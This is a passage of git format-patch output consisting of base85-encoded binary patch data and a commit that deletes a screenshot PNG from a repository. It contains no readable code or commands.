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 From 172d6f810ab78f1a864dde2d6e2742a79d182a49 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:33:32 +0100 Subject: [PATCH 012/214] Delete screenshot3.png --- screenshot3.png | Bin 98956 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 screenshot3.png diff --git a/screenshot3.png b/screenshot3.png deleted file mode 100644 index 2b8f5eb7d4ca1f14e5b0a25e16b5c89dda1115b0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 98956 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 